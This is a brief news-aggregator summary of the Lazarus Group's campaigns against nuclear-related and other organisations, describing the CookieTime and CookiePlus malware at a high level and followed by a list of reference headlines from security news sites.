These cyber intrusions use complex infection chains and modular malware that use a variety of components, such as downloaders, loaders and backdoors. The malware includes 'CookieTime' which can download payloads and 'CookiePlus', disguised as a Notepad++ plugin, which uses advanced decryption techniques to fetch plugins. The group's motivation behind the attacks is believed to be both financial gain and espionage. The ongoing attacks highlight the evolving threat landscape posed by state-sponsored actors targeting sensitive industries and organizations.
Recommended read:
References :
- cyberinsider.com: North Korean Hackers ‘Lazarus’ Target Nuclear Orgs with New Malware
- osint10x.com: North Korean hackers spotted using new tools on employees of 'nuclear-related' org
- CyberInsider: The notorious Lazarus Group has evolved its infection tactics, employing both updated and novel malware like ‘CookiePlus' to infiltrate targets in defense, aerospace, cryptocurrency, and nuclear industries.
- Osint10x: North Korean hackers spotted using new tools on employees of 'nuclear-related' org
- ciso2ciso.com: Lazarus APT targeted employees at an unnamed nuclear-related organization
- securityaffairs.com: Lazarus APT targeted employees at an unnamed nuclear-related organization
- www.cybersecurity-insiders.com: Lazarus launches malware on Nuclear power org and Kaspersky Telegram Phishing scams
- ciso2ciso.com: Lazarus APT targeted employees at an unnamed nuclear-related organization
- www.cybersecurity-insiders.com: Lazarus launches malware on Nuclear power org and Kaspersky Telegram Phishing scams
- ciso2ciso.com: Lazarus Group Targets Nuclear Industry with CookiePlus Malware – Source:hackread.com
- : Lazarus Group Targets Nuclear Industry with CookiePlus Malware – Source:hackread.com
|
|
FlagThis - #northkorea